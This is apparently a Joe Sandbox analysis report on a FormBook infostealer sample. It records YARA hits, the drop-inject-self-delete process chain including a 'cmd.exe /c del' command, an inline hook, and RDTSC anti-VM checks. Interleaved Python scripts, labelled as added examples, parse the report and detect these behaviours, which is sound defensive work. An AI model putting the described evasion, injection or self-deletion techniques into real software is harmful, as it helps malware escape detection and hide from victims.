          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: String function: 0181B150 appears 35 times
          Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: String function: 04DEB150 appears 32 times
          Source: HOPEFUL.exe, Binary or memory string: OriginalFilename vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameSHCore1.dll0 vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000002.296333169.0000000003121000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameRunPe6.dll" vs HOPEFUL.exe
          Source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameAddInProcess32.exeT vs HOPEFUL.exe
          Source: HOPEFUL.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
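          The identifiers in these rows carry the sandbox process id twice: a code-function id such as 19_2_04E120A0 is pid 19, run 2, address 0x04E120A0, and a dump name such as 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp starts with the same pid in hex (0x13 = 19). Reading them together shows which process each Formbook match sits in: the 00000013.* hits are cmmon32.exe, the hit at base 0000000000400000 in pid 5 is the hollowed AddInProcess32.exe image, and the 00000000.* hits are the original HOPEFUL.exe. The following Python script is an added example, not part of the Joe Sandbox report: it parses a handful of rows copied from above and maps every memory YARA match to a process name and a page protection. The meaning of the dump-name fields (pid, run, dump id, base, protection, flags) is an assumption inferred from how they line up with the other rows; the PAGE_* values are the winnt.h constants, and the sixth field is left undecoded.

```python
import re

# PAGE_* memory-protection constants from winnt.h.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Code-function ids look like 19_2_04E120A0: <pid decimal>_<run>_<address>.
CODE_FUNC_RE = re.compile(
    r"Source: (?P<path>\S+) Code function: (?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]{8})")
# Dump names look like 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp.
# Field meanings (pid hex, run, dump id, base, protection, flags) are an assumption
# inferred from how they line up with the other rows; the flags field is not decoded.
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-F]{8})\.(?P<run>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<flags>[0-9A-F]{8})\.sdmp")
NAMED_SDMP_RE = re.compile(r"Source: (?P<name>[\w.]+\.exe), (?P<dump>[0-9A-F.]+\.sdmp)")
YARA_RE = re.compile(r"Source: (?P<dump>[0-9A-F.]+\.sdmp), type: MEMORY Matched rule: (?P<rule>\S+)")

# Constructed input: rows copied from the report above.
REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_04E120A0",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_018E22AE",
    r"Source: C:\Users\user\Desktop\HOPEFUL.exe Code function: 0_2_02F005E6",
    "Source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp Binary or memory string: wscui.pdb",
    "Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1",
    "Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook",
    "Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1",
]


def parse_sdmp(name):
    """Split a .sdmp dump name into pid, base address and decoded protection."""
    m = SDMP_RE.search(name)
    if not m:
        return None
    prot = int(m["prot"], 16)
    return {
        "pid": int(m["pid"], 16),
        "base": int(m["base"], 16),
        "protection": PAGE_PROTECTION.get(prot, hex(prot)),
        "executable": bool(prot & 0xF0),
    }


def build_pid_map(lines):
    """Map sandbox pids to image names from the two row kinds that carry a name."""
    pid_map = {}
    for line in lines:
        m = CODE_FUNC_RE.search(line)
        if m:
            pid_map[int(m["pid"])] = m["path"].rsplit("\\", 1)[-1]
            continue
        m = NAMED_SDMP_RE.search(line)
        if m:
            pid_map[parse_sdmp(m["dump"])["pid"]] = m["name"]
    return pid_map


def yara_hits(lines):
    """Attach process name and page protection to every memory YARA match."""
    pid_map = build_pid_map(lines)
    hits = []
    for line in lines:
        m = YARA_RE.search(line)
        if not m:
            continue
        d = parse_sdmp(m["dump"])
        hits.append({"pid": d["pid"], "process": pid_map.get(d["pid"], "?"),
                     "base": d["base"], "protection": d["protection"],
                     "executable": d["executable"], "rule": m["rule"]})
    return hits


def triage(lines):
    """One line per hit; executable regions are where the unpacked payload runs."""
    return [
        f"pid {h['pid']:>2} {h['process']:<20} base 0x{h['base']:08X} {h['protection']:<24} "
        f"{h['rule']} {'[code region]' if h['executable'] else '[data region]'}"
        for h in yara_hits(lines)
    ]


if __name__ == "__main__":
    print("\n".join(triage(REPORT_LINES)))
```

          Run against the full report rather than the seven constructed rows, the same mapping separates the RWX regions that hold the running payload (pid 5 at 0x400000 and 0x17B0000, pid 19 at 0xEC0000 and 0x3090000) from the read-write buffers in pid 0 where the packer staged it before injection.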
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@4/3
          Source: C:\Users\user\Desktop\HOPEFUL.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HOPEFUL.exe.log
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
          Source: C:\Users\user\Desktop\HOPEFUL.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: HOPEFUL.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HOPEFUL.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\HOPEFUL.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: HOPEFUL.exe ReversingLabs: Detection: 31%
          Source: unknown Process created: C:\Users\user\Desktop\HOPEFUL.exe 'C:\Users\user\Desktop\HOPEFUL.exe'
          Source: unknown Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HOPEFUL.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
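          The "Process created" rows form a drop, run and clean-up chain: HOPEFUL.exe writes a file named AddInProcess32.exe (the name of the .NET Framework add-in host, whose genuine copy lives under C:\Windows\Microsoft.NET\Framework\) to the user's Temp directory and runs it, cmmon32.exe is started from SysWOW64, and cmmon32.exe finally runs cmd.exe /c del to remove the dropped file so that only the injected copies survive. The following Python script is an added detection example, not part of the report: it runs the corresponding checks over constructed Sysmon-style process-creation events modelled on those rows and correlates the launch of the dropped file with its later deletion. The parent of cmmon32.exe is assumed to be explorer.exe for the constructed sample, since the report lists it as unknown, and the path and name lists are illustrative.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal Sysmon event 1 shape: parent image, child image, command line."""
    parent: str
    image: str
    cmdline: str


# Constructed events modelled on the "Process created" rows above. The report
# lists the parent of cmmon32.exe as unknown; explorer.exe is assumed here.
EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Users\user\Desktop\HOPEFUL.exe",
              r"'C:\Users\user\Desktop\HOPEFUL.exe'"),
    ProcEvent(r"C:\Users\user\Desktop\HOPEFUL.exe", r"C:\Users\user\AppData\Local\Temp\AddInProcess32.exe",
              r"C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\cmmon32.exe", r"C:\Windows\SysWOW64\cmmon32.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\cmmon32.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign control
]

# Illustrative lists; tune them to the environment.
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Downloads|Users\\Public)\\", re.IGNORECASE)
SYSTEM_DIR = re.compile(r"^c:\\windows\\(system32|syswow64)\\", re.IGNORECASE)
DEL_RE = re.compile(r"/c\s+del\s+['\"]?(?P<target>[^'\"]+?\.exe)['\"]?", re.IGNORECASE)
# .NET Framework helper binaries whose names get reused for dropped payloads;
# the genuine files live under C:\Windows\Microsoft.NET\Framework*\.
FRAMEWORK_NAMES = {"addinprocess32.exe", "addinprocess.exe", "regasm.exe",
                   "regsvcs.exe", "installutil.exe", "msbuild.exe"}
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe",
                 "wscript.exe", "cscript.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, subject) findings for the drop/run/self-delete chain."""
    findings = []
    launched_from_user_dirs = set()
    for e in events:
        img, par = basename(e.image), basename(e.parent)
        if USER_WRITABLE.search(e.image):
            launched_from_user_dirs.add(e.image.lower())
            findings.append(("execution_from_user_writable_path", e.image))
        if img in FRAMEWORK_NAMES and not e.image.lower().startswith("c:\\windows\\microsoft.net\\"):
            findings.append(("framework_binary_name_outside_framework_dir", e.image))
        if img == "cmd.exe":
            m = DEL_RE.search(e.cmdline)
            if m and USER_WRITABLE.search(m["target"]):
                # The deletion is far more telling when the same file ran earlier.
                tag = ("run_then_self_delete_chain" if m["target"].lower() in launched_from_user_dirs
                       else "delete_of_executable_in_user_dir")
                findings.append((tag, m["target"]))
            if SYSTEM_DIR.match(e.parent) and par not in SHELL_PARENTS:
                findings.append(("system_binary_spawns_shell", e.parent))
    return findings


if __name__ == "__main__":
    for rule, subject in detect(EVENTS):
        print(f"{rule:<45} {subject}")
```

          On the constructed sample the script raises four findings, all on the two AddInProcess32.exe rows; the conhost.exe and notepad.exe events produce none. The correlation matters because the del command on its own is easy to dismiss as an installer cleaning up, while "file ran from Temp, then a non-shell system binary deleted it" is the FormBook pattern the report documents.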
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\HOPEFUL.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: HOPEFUL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HOPEFUL.exe Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: HOPEFUL.exe Static file information: File size 3437056 > 1048576
          Source: HOPEFUL.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x346600
          Source: HOPEFUL.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: cmmon32.pdb source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, cmmon32.exe, 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmmon32.exe
          Source: Binary string: AddInProcess32.pdbpw source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, 00000005.00000002.341420581.0000000000DE2000.00000002.00020000.sdmp, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HOPEFUL.exe Code function: 0_2_02F005E6 pushfd ; iretd
          Source: C:\Users\user\Desktop\HOPEFUL.exe Code function: 0_2_02F04E9A push es; iretd
          Source: C:\Users\user\Desktop\HOPEFUL.exe Code function: 0_2_02F04B71 push es; iretd
          Source: C:\Users\user\Desktop\HOPEFUL.exe Code function: 0_2_02F00A2A push ds; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0041CEB5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0041CF6C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0041CF02 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0041CF0B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_0186D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_04E3D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_00EDD856 push esi; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_00EDCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_00EDCF6C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_00EDCF0B push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 19_2_00EDCF02 push eax; ret
          Source: C:\Users\user\Desktop\HOPEFUL.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\HOPEFUL.exe File opened: C:\Users\user\Desktop\HOPEFUL.exe\:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE0
          Source: C:\Users\user\Desktop\HOPEFUL.exe Process information set: NOOPENFILEERRORBOX (38 identical entries)
          Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000000EC98E4 second address: 0000000000EC98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000000EC9B5E second address: 0000000000EC9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 5_2_00409A90 rdtsc
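          The interceptor rows show the whole anti-VM probe: two rdtsc instructions six bytes apart (0x4098E4 and 0x4098EA in AddInProcess32.exe, the same code at 0xEC98E4 and 0xEC98EA once it lives in cmmon32.exe) with only xor ecx, ecx / add ecx, eax between them. The first read's low dword is parked in ecx, the second read lands in eax, and the difference is the cost of rdtsc itself; under a hypervisor that traps or rewrites the instruction that cost is far larger than on bare metal, which is what the sample measures. The following Python script is an added example, not part of the report: it scans a constructed 32-bit code fragment containing that exact byte sequence (0F 31 = rdtsc, 31 C9 = xor ecx,ecx, 01 C1 = add ecx,eax) for rdtsc pairs within a short window, the static counterpart of the sandbox's runtime interceptor. The instructions after the second rdtsc (sub eax,ecx and a cmp against a threshold) are assumed for the sample; the report does not show them.

```python
RDTSC = b"\x0f\x31"  # rdtsc opcode (x86, no prefix)

# Constructed 32-bit fragment: the sequence the sandbox reported at 0x4098E4,
# with filler before it and two widely separated rdtsc reads after it.
FRAGMENT = (
    b"\x55\x8b\xec\x83\xec\x10"          # push ebp; mov ebp,esp; sub esp,0x10 (filler)
    + RDTSC                               # rdtsc            (0x4098E4 in the report)
    + b"\x31\xc9"                         # xor ecx,ecx
    + b"\x01\xc1"                         # add ecx,eax      (keep low dword of 1st read)
    + RDTSC                               # rdtsc            (0x4098EA in the report)
    + b"\x2b\xc1"                         # sub eax,ecx      (assumed: delta = 2nd - 1st)
    + b"\x3d\x00\x10\x00\x00"             # cmp eax,0x1000   (assumed threshold)
    + b"\x90" * 40 + RDTSC + b"\x90" * 40 + RDTSC   # unrelated reads, too far apart to flag
)


def find_rdtsc(code):
    """Offsets of every rdtsc opcode in a raw byte string (no disassembly)."""
    return [i for i in range(len(code) - 1) if code[i:i + 2] == RDTSC]


def find_rdtsc_pairs(code, base=0, window=16):
    """(first, second) addresses of consecutive rdtsc reads at most `window` bytes apart.

    Two reads this close, with only register moves between them, time the rdtsc
    instruction itself, which is the classic hypervisor-trap probe. A raw byte
    scan can also hit 0F 31 inside an immediate or displacement, so confirm hits
    with a disassembler before turning them into a signature.
    """
    offsets = find_rdtsc(code)
    return [(base + a, base + b) for a, b in zip(offsets, offsets[1:]) if b - a <= window]


def report(code, base):
    """Format hits the way the sandbox's interceptor rows do."""
    return [f"First address: {a:016X} second address: {b:016X}"
            for a, b in find_rdtsc_pairs(code, base)]


if __name__ == "__main__":
    print("\n".join(report(FRAGMENT, 0x4098DE)))
```

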